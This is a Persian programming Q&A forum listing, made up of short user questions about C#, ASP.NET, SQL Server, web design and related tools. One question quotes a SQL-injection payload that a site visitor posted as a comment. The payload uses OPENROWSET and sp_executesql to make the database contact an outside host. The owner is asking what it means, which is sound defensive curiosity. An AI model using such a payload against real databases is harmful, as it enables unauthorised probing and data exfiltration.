آخرین فرصت تا %60 تخفیف خرید یکجای دوره ها برای 5 نفر فقط تا
00 00 00

سلام میخوام لوگوی یک شرکت را بالای صفحه ام موقع پرینت داشته باشم نمی دونم چی کار کنم

سلام وقتتون بخیر. یه input دارم، میخوام اینو هم به صورت افقی و هم به صورت عمودی بزرگترش کنم.چیکار باید کرد؟ توی HTML نوشتم. سپاس 

چندتا سوال ۱.آیاوقتی که برنانه رو نوشتی وفایل نصبی که به مشتری دادی آیا لازمه اونم تو کامپیوترش اسکیوال را نصب کنه؟ چون تو ساخت فایل نصبی تو ویژوال تو قسمت افزونه ها خواستن اسکیوال رو نصب کنه بهم لرور داد.۲.چیکار کنم بعد از اینکه فایل رو به مشتری دادم تو کامپیوتر اونم درست کار کنه؟تشکر

با سلام من میخوام برنامه نویسی رو تازه شروع کنم البته ی آشنایی با PHP دارم و ی دوره کوتاه رفتم میخواستم بدونم برای اینده و بازار کار بهتره چی شروع کنم و با چی کار کنم؟

سلام می خواستم بدونم که با در نظر گرفتن ملاک های زیر کدوم زبان از همه بهتره؟ میزان درآمددر ایران وخارج از ایران بازار کار در ایران و خارج از اون کاربرد های وسیع. و اینکه قابلیت هایی که در بالا گفتم پس از گذشت 3  4 سال سر جاش بمونه البته بدون در نظرگرفتن علاقم  مثلا یه چند وقتی هست که شندیم...

باسلام  من از یک گرید ویو استفاده میکنم که نیاز دارم توی هر ردیف در سلول خاصی در کنار مقدار ورودی یک دکمه برای باز شدن پنجره در زیر سلول انتخابی داشته باشم(تقریبا مثل عکس ضمیمه)    اگه میشه منو راهنمایی کنید ممنون

سلام وقت بخیر دوستان لطفا اگر با ابزارهای گزارش گیری مخصوص وب سایت تجربه ای دارند بیان کنند و از نظر خودشان بهترین ابزار را معرفی کنند توجه داشته باشید منظورم از گزارش گیری، خروجی مخصوص چاپ می باشد، که مرتب و منظم و بدون مشکل و به راحتی برای کاربر اطلاعات چاپ شوند، در حال حاضر دارم از Stimulsoft Rep...

سلام زمان نصب sql server 2008 r2  به جای گزینه sql server feature installatio  من گزینه All feature With Defult  را انخاب کردم و در مرحله بعد select all  آیا مشکلی در کارکرد برنامه پیش میاد سوال بعد در قسمت Tab Collation مهم است کدام گزینه انتخاب شود من Arabic را انتخاب کردم &nb...

با سلام  در لود اسمبلی توسط AppDomain  با مشکل مواجه هستم  مشکل از کجاست؟؟ با اینکه اسمبلی رو ساختم و کنار فایل پروژه قرار دادم اول Fail میکنه وبعد یک استثناء هم میده

با سلام و احترام خدمت استاد گرامی .  یک فرم دارم که اطلاعات شرکت رو ثبت می کنم ( مثلا کد اقتصادی و نام شرکت و نوع شرکت و...)   و داخل دیتابیس ذخیره کردم و داخل دیتا گرید ویو و کمبو باکس نمایش دادم تا اینجا مشکلی نسیت  حالا میخوام وقتی یکی از ایتم های کمبو باکس ( نام شرکت )  رو ان...

با سلام خدمت اساتید محترم سایت. در برنامه سی شارپ یک صفحه به صورت WPF درست کردم که داخل این صفحه یک دیتاگرید ویو (dataGrid_S) متصل به دیتابیس SQL متصل شده ستون اول نام کالا ، ستون دوم تعداد کالا و ستون سوم تعداد مانده کالا می باشد. با انتخاب سطر کالا خاص و باز شدن یک فرم دیگر و ثبت تعداد توسط تکس با...

  داخل قسمت تبدیل Button های keyboard button  به inlinle keyboard button  به مشکل خوردم و با این خطا مواجه میشم Severity Code Description Project File Line Suppression StateError CS1729 'InlineKeyboardButton' does not contain a constructor that takes 1 arguments WindowsFormsApp1 ...

سلاممن کد زیر را دارم <!DOCTYPE html> <html lang="fa" dir="rtl"> <head>     <meta charset="utf-8">     <meta http-equiv="X-UA-Compatible" content="IE=edge">     <meta c...

این سوال توسط +989113875438 در تاریخ 06/01/1399 07:11:33 ق.ظ حذف شده است.

دلیل: unknown

سلام ممنون از سایت خوبتونادامه اموزش های برنامه نویسی فلاتر رو از کجا میتونم پیدا کنم؟؟اینجا فقط 9 تا درس هست و کامل نیست

با سلام در طراحی جداول بانک اطلاعاتی بهتری شکل طراحی جدول آدرس چگونه هست ،ایا باید آدرس رو در فیلدهای مختلف گذاشت یا اینکه یک پروپرتی با نام ادرس ایجاد کرد و آدرس رو کامل در یک پروپرتی ذخیره کرد.ممنون 

با سلام در مدل کد فرست برای نوشتن موجودیتها و طراحی جداول بانک دو مدل  DataAnotation و fluent Api هست و خوب من نمیدونم کدام بهتر هست ،  لطفا دوستان راهنمایی کننند.

سلام  من oraclesql developer  را نصب کردم بعد از اولین نصب و اتصال به بانک اطلاعاتی ، وقتی از نرم افزار oraclesql developer  خارج شدم  دوباره نمی تونم مکان اجرای oraclesql developer  را پیدا کنم .   

سلام نوروز همگی مبارک تفاوت این دو و بیشتر flow request در component based framework رو میخواستم بدونم ممنون

سلام دوستان،من از روش design first در سایتم (asp.net mvc)َ استفاده میکنم. میخام بدونم تفاوت این که از جدول اصلی برای نمایش اطلاعات توی گرید یا جای دیگه استفاده کنم چه تفاوتی داره با زمانی که از proc,view,func استفاده کنم. آیا باید حتما از اینا استفاده کنم؟ ممنون میشم اگه جواب کامل بدید مثلا اگه به خ...

این سوال توسط +989351002011 در تاریخ 01/01/1399 04:59:14 ب.ظ حذف شده است.

دلیل: unknown

این سوال توسط +989017029077 در تاریخ 03/01/1399 08:23:36 ق.ظ حذف شده است.

دلیل: کسی مایل به جواب دادن نبوده

طراحی سایت با ورد پرس با HTML وCSSچه فرقی داره؟تفاوت اصلی در چیه؟    

سلام وقت بخیر برای ران کردن پروژه asp.net core 3.1  با iis express و لوکال هاست فایر فاکس این ارور میده ولی IE BROWSER بدون مشکل باز میکنه گوگل هم زیاد کردم ولی هیچ راهکاری جواب نداد Secure Connection Failed An error occurred during a connection to localhost:44367. Certificate key usage inadequ...

سلام وقت بخیر دو نوع ساختار برای توسعه وب در قالب asp  داریم asp.net core  &&  asp.net mvc سوالم اینه که پس asp.net core mvc چیه ؟ ایا ترکیب اون دو تاست ؟ یا نه من کلا بد متوجه شدم؟

سلام سوال درباره کلاس های سی شارپ سوالم اینه که اگه بخوام یه برنامه برای مدیریت سخت افزار سیستم بنویسم از namespace و کلاسی باید استفاده کنم ؟ خودم فکر می کنم از فضای نام system.managment باید استفاده کنم ولی اینکه از چه کلاسی باید استفاده کنم نمی دونم و برنامه ای که می خوام بنویسم می خوام دادهای رم...

سلام ، مطمئن نیستم که هنوان سوال خیلی هم مناسب باشه ، ولی اصطلاح بهتری به ذهنم نرسید. تو برنامه ای که با ASP.net Core هست یک Area دارم که مسیر اون به این صورته : [Area("MasterData")]  و تو فایل Startup هم کد زیر رو اضافه کرده ام :                 routes.M...

سلام این تکه کد من با پایتون: insta_url =('https://www.instagram.com')inta_username = input('enter username of instagram : ')   response = requests.get(f"{insta_url}/{inta_username}/")  موقع اجرا میگه syntax error   مشکلش چیه؟

سلام فایل بهینه کردن url ها  به شماره 53 وسط دانلود قطع میشه با قیمت 5 خورده ای خریداری شده لطفا اگر لینکی دیگه داره ارسال کنید

سلام می خوام یه برنامه بنویسم با زبان c# که اطلاعات داخل رم کارت گرافیک و یعنی اطلاعاتی که جی پی یو از پردازش تصاویر به دست اورده و داخل رمش ذخیره کرده و بهم نشون بده و یه سوال دارم در رابطه با wmi که این ایا یک برنامه یا همون تکنولوژی از ویندوز هست ؟ و اینکه طرز کار دقیقش و می خوام بدونم چجوری وظیف...

سلام دوستان یک اپلیکیشن موبایلی رایگان برای برگزاری آزمون آنلاین می خواستم فقط در حد سوال و جواب و دادن نمره. آنالیز خاصی نمیخوام.

دوستان سلام ، تو یک پروژه asp.net core  دو تا کلاس دارم با مشخصاتی شبیه این : Public Class Charge {  int Id  int Name   [ForeignKey("ChargeGroup")]  public int ChargeGroupId;  [ForeignKey("ChargeGroupId")]  public virtual ChargeGroup ChargeGroup { ge...

سلام. من هرچقد بک اپ میگیرم فایل manfaactory خالیه؟ و داخل نرم افزار هم لیست ماهای قبل نیس؟یعنی همه اطلاعات قبلی پاک شده؟اگه اینطوره راهی هست؟ لطفا راهنماییم کنید.ممنونم

با سلام. وقتی بک آپ میگیرم از نرم افزار بیمه چیزی داخل manufactory نیست چرا؟

سلام بچه ها من یه مشکلیدارم برام تبدیل شده به کلافگی مزمن  من قبلا Visua Studio 2015 رو روی ویندوز 8.1 نصب کردم و حتی ازش استفاده هم کردم  الان بعد یه مدت ویندوزمو که عوض کردم میام نصب کنم بهم موقع نصب تا یه جایی میره بعد  ارور میده  کسی میدوننه چجوری میشه حلش کرد  

با سلام و درود  میخواستم بدانم آیا در زبان #C میتوان صفحات متن باز مانند EXCEL ایجاد نمود؟ ، بسیار قدردان خواهم بود که بنده را راهنمایی فرمایید.  با سپاس  رضوی  با سلام و درود  میخواستم بدانم آیا در زبان #C میتوان صفحات متن باز مانند EXCEL ایجاد نمود؟ ، بسیار قدردان خواهم بو...

سلام من وقتی  پروژمو build  می کنم ، دیتابیس اون توی sql server  ساخته نمیشه. مشکلش چیه؟ویژوال استودیو و sql server  رو هم یک بار از نو نصب کردم ولی نمیشه

سلام می خواستم بدونم قطعات سخت افزاری یک سیستم چطور با هم ارتباط برقرار می کنن و خود سیستم عامل سیستم عامل یعنی می خوام بدونم برای هر قطعه سخت افزاری یک کانکشن یا چیز دیگه ای مثل این تعریف میشه و اگه میشه چجوری میشه اون و از سیستم عامل خواست و تو برنامه ازش استفاده کرد ؟ چون من می خوام یه برنامه بنو...

سلام سوال دارم در رابطه با c# سوالم این که من قصد نوشتن برنامه مدیریتی برای رم کارت گرافیک سیستم و دارم برای این کار باید از فضای نام managment استفاده کنم و بعد از اون باید رم به عنوان یک شی تعریف کنم و ... یا نه ؟ کلا می خوام بدونم نوشتن برنامه ای برای قطعات سخت افزاری با سی شارپ چجوری ؟ 

با سلام با احترام من دوره c# پبشرفته رو تهیه کردم نحوه ارسال به درب منزل چگونه است . با تشکر

مشکل این کد چیه که اجرا نمیشه package info.somaiye.namekodak; import androidx.appcompat.app.AppCompatActivity; import android.os.Bundle;import android.widget.ArrayAdapter;import android.widget.ListView; import java.util.ArrayList;import java.util.List; public class alef_dokhi extends AppCompatActivi...

سلام جناب من یک سایتی طراحی کردم ک کاملا ریسپانسیو و همه چی و وقتی قبل اپلود چک میکنم اوکی تو همه سایزا ولی وقتی آپلود میکنم رو هاست سایز خیلی از عکسا بهم میخوره ک اینم در گوشی های مختلف با مرورگر های مختلف چک کردم متغیر و در بعضی ها درست بعضی ها خراب بعضی ها فقط بعضی مرورگر ها درست ولی اکثرا بعضی ع...

سلام من توی سی شارپ سی و دو تا picturebox گذاشتم با عکس های مختلف می خوام این picturebox ها توی یک لیست قرار بگیرن و به صورت تصادفی به top اونا اضافه بشه و از بالا به پایین بیان  یعنی میخوام picturebox ها عکس های مشخصی داشته باشن اما اینکه کدوم بیاد پایین رو برنامه خودش به صورت تصادفی انتخاب کن...

سلام سوال داشتم در رابطه با کلاس های سی شارپ سوالم این که سی شارپ خودش یک سری کلاس از پیش تعریف شده داره که اول برنامه اونار و فرامی خونیم ولی من می خوام اگه امکانش درباره همه ی کلاس های از پیش تعریف شده تو سی شارپ برای کاربردشون بدونم ولی تو اینترنت هر چی میزنم چیزی که می خوام و نمیاره می خواستم بد...

سلام.وقت بخیر کاربر سایتم در بخش نظرات کد زیر رو ارسال کرده . DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','0s7k_ua5-6akuog-rz_peqatnksld0n67iyjg5zs'+'yqa.r87.me')exec sp_executesql @r   میخواستم دق...

سلام دوستان. من هرچقدر فکر کردم که چطور یک تایمر خودکار برای تخفیف استفاده کنم، آخرش بازم برام یه سوالایی پیش اومد که جوابش رو نتونستم پیدا کنم. آموزشی تو سایت در مورد ساخت تایمر خودکار برای وبسایت درست شده؟ اگه درست شده ممنون میشم لینک آموزش رو بفرستید برام

سلام.اگر کسی میتونه یه کد بنویسه که ورودی بگیره و طبق الگوریتم زیر خروجی بده.ممنون

سلام من میخوام داخل سایتم هر کسی یک بار در نظر سنجی شرکت کنه چطور باید از کد پرسنلی تکراری جهت شرکت در نظر سنجی جلوگیری کنم ممنون میشم منو راهنمایی کنید  

سلام وقتتون بخیر من یک سایت نظرسنجی میخوام طراحی کنم که هرسوال چهار گزینه دارد میخوام به هر گزینه ای که با ردیوباتن طراحی کردم یه امتیاز بدم که در نهایت بعد از انجام نظر سنجی توسط کاربران بتونم از اون یه گزارش تهیه کنم که مثلا بگم سوال اول مجموع امتیازاتش چند است ؟ ممنون میشم راهنماییم کنید

تنظیمات حریم خصوصی
تائید صرفنظر